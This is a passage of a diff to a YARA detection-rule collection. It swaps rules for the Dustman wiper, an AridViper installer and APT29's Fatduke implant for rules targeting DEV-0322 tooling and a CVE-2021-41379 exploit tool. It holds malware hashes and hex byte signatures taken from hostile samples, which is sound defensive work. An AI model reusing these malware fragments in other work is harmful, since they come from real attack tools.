+		hash1 = "fb101d9980ba2e22dceac7367c670b4894eaae9a8cef9de98ed85499a3b014ea"
+		hash2 = "134a570f480536d04a056da99e58a3c982aa36f5b314f48a01420b66b759d35d"
+		hash3 = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0"
 		tlp = "white"
-		adversary = "APT34"
+		adversary = "DEV-0322"
 
 	strings:
-		$s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 }
-		$s2 = "\\assistant.sys" fullword wide
-		$s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 }
-		$s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 }
-		$s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 }
-		$s6 = "Release\\Dustman.pdb" fullword ascii
+		$obj1 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
+		$obj2 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 }
+		$arg1 = { 2d 73 74 6f 70 65 6e 67 69 6e 65 }
+		$arg2 = { 2d 73 74 61 72 74 73 65 72 76 69 63 65 }
+		$s1 = { 3c 3c 2d 20 41 64 6d 69 6e 54 79 70 65 }
+		$s2 = { 43 55 73 65 72 50 61 73 73 77 6f 72 64 41 74 74 72 5c 72 5c 6e 50 61 73 73 77 6f 72 64 }
+		$s3 = { 3c 3c 2d 20 50 61 73 73 77 6f 72 64 43 68 61 6e 67 65 64 4f 6e 5c 72 5c 6e 43 52 68 69 6e 6f 55 69 6e 74 41 74 74 72 }
+		$s4 = { 3c 3c 2d 20 49 6e 63 6c 75 64 65 52 65 73 70 43 6f 64 65 73 49 6e 4d 73 67 46 69 6c 65 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 4 of them
+		filesize > 1KB and filesize < 15KB and all of ( $obj* ) and all of ( $arg* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect Installer used by AridViper group in Febuary 2021"
+		description = "Detect exploit tool using CVE-2021-41379 (variant 2)"
 		author = "Arkbird_SOLG"
-		id = "3d891aeb-b4d6-50f2-ad08-cb6d9d56064d"
-		date = "2021-02-08"
-		modified = "2021-02-09"
+		id = "29fe9a9c-5180-55c8-882b-ad18981dc011"
+		date = "2021-11-26"
+		modified = "2021-11-29"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-08/AridViper/APT_AridViper_Installer_Feb_2020_1.yar#L1-L26"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "1fca713b7ac7f3e960a4174325c32578724e87241e159fbf7754c7e2d19779a1"
-		score = 50
-		quality = 69
-		tags = "FILE"
-		level = "Experimental"
-		hash1 = "16ed131c4a7545495dc3f07d199748a5d0560e7c8a44493c1906163bedc9c2e0"
-		hash2 = "84d9c7852b87253ccf0ca1aad57e510a4badfe253c063a72c7751930f0279c83"
+		logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068"
+		score = 75
+		quality = 75
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0"
+		hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed"
+		hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb"
+		hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq_db = { 8b 7d ec 33 d2 89 55 ec 8b 0f 8b c1 89 4d e4 38 11 74 2e 66 90 83 f8 ff 73 24 8a 08 40 80 f9 c0 72 16 8a 08 80 e1 c0 80 f9 80 75 0c 8a 48 01 40 80 e1 c0 80 f9 80 74 f4 42 80 38 00 75 d7 89 55 ec f7 46 18 00 00 08 00 74 47 8b d7 8b cb e8 a2 f9 ff ff 89 45 e0 85 c0 74 34 83 7d f0 01 b9 [3] 00 50 ff 75 f8 b8 [3] 00 ff 75 e4 0f 44 c8 51 ff 75 f4 68 [3] 00 53 e8 34 2e 00 00 8b 55 e0 83 c4 1c 8b ce e8 ?? c3 fc ff 8b 55 ec ff 75 e4 8b 45 f8 b9 [3] 00 83 7d f0 01 52 50 50 50 50 50 b8 [3] 00 0f 44 c1 50 ff 75 f4 68 [3] 00 53 e8 f8 2d 00 00 83 c4 2c ba [3] 00 8b ce ff 75 f4 e8 e6 2e 00 00 83 c4 04 85 c0 74 16 ff 37 ff 75 f8 ff 75 f4 68 [3] 00 53 e8 cc 2d 00 00 83 c4 14 8b d7 8b cb e8 90 f9 ff ff 89 45 e0 85 c0 74 1e 50 8b 45 f8 50 50 68 [3] 00 53 e8 a8 2d 00 00 8b 55 e0 83 c4 14 8b ce e8 ?? c3 fc ff f7 46 18 00 00 08 00 74 2e 8b cf e8 db e5 00 00 8b f0 85 f6 74 1e 0f 1f 44 00 00 8b 16 3b d7 74 0c ff 32 8b cb e8 f1 f9 ff ff 83 c4 04 8b 76 0c 85 f6 75 e7 8b 75 e8 ff 75 f8 8b d7 8b cb e8 d8 f9 ff ff 83 c4 04 }
-		$seq_createdb = { 8a 43 42 84 c0 78 05 0f be c0 eb 07 8b cf e8 ?? 91 fb ff 8b 4d f8 8b d0 e8 ?? 90 fb ff 68 [3] 00 8b d6 8b cb e8 4d fc ff ff 8b f8 83 c4 04 85 ff 0f 85 41 01 00 00 68 [3] 00 8b d6 8b cb e8 32 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 26 01 00 00 68 [3] 00 8b d6 8b cb e8 17 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 0b 01 00 00 68 [3] 00 8b d6 8b cb e8 fc fb ff ff 8b f8 83 c4 04 85 ff 0f 85 f0 00 00 00 68 [3] 00 8b d6 8b cb e8 e1 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 d5 00 00 00 68 [3] 00 8b d6 8b cb e8 c6 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 ba 00 00 00 68 [3] 00 8b d6 8b cb e8 eb fa ff ff 8b f8 83 c4 04 85 ff 0f 85 9f 00 00 00 33 f6 0f 1f 40 00 0f 1f 84 00 00 00 00 00 }
-		$OP_Files1 = { 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 80 3d [3] 00 00 75 04 33 c9 eb 11 b9 [3] 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 }
-		$OP_Files2 = { 00 00 83 c4 04 83 78 18 10 72 05 8b 40 04 eb 03 83 c0 04 [3-9] 00 50 68 [3] 00 6a 00 6a 00 ff [1-5] 8b 95 c8 fe ff ff 83 fa 10 72 0c 8b 8d b4 fe ff ff }
-		$s1 = "D$t9D$ }J" fullword ascii
-		$s2 = "u#h`KN" fullword ascii
-		$s3 = { 6f 73 5f 77 69 6e 2e 63 3a 25 64 3a 20 28 25 6c 75 29 20 25 73 28 25 73 29 20 2d 20 25 73 }
-		$s4 = { 61 63 63 65 73 73 20 74 6f 20 25 73 2e 25 73 2e 25 73 20 69 73 20 70 72 6f 68 69 62 69 74 65 64 }
-		$s5 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
-		$s6 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
+		$s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 }
+		$s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 }
+		$s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b }
+		$s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 600KB and 3 of ( $s* ) and $seq_db and $seq_createdb and all of ( $OP_Files* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect Fatduke implant used by APT29 group"
+		description = "Detect exploit tool using CVE-2021-41379"
 		author = "Arkbird_SOLG"
-		id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff"
-		date = "2021-03-08"
-		modified = "2021-03-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25"
+		id = "616e697d-0c62-58bb-9f37-29670a09d886"
+		date = "2021-11-26"
+		modified = "2021-11-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a"
-		score = 50
-		quality = 67
-		tags = "FILE"
-		hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57"
-		level = "Experimental"
+		logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a"
+		score = 75
+		quality = 75
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612"
+		hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07"
+		hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd"
+		hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 }
-		$seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 }
-		$seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d }
-		$seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 